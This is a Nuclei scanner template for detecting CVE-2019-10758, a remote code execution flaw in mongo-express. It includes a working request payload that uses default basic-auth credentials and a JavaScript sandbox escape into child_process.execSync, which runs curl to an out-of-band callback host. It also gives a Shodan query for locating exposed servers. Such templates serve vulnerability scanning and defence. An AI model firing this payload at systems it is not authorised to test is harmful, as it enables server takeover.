nuclei-templates/cves/2019/CVE-2019-10758.yaml

33 lines
1.3 KiB
YAML
Raw Normal View History

2022-02-10 21:31:25 +00:00
id: CVE-2019-10758
info:
name: Mongo-Express Remote Code Execution - CVE-2019-10758
author: princechaddha
severity: critical
description: mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment.
reference:
- https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758
- https://nvd.nist.gov/vuln/detail/CVE-2019-10758
remediation: This issue will be fixed by updating to the latest version of mongo-express
metadata:
shodan-query: http.title:"Mongo Express"
tags: cve,cve2019,mongo,mongo-express
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.90
cve-id: CVE-2019-10758
2022-02-10 21:31:25 +00:00
requests:
- raw:
- |
POST /checkValid HTTP/1.1
Host: {{Hostname}}
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}")
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"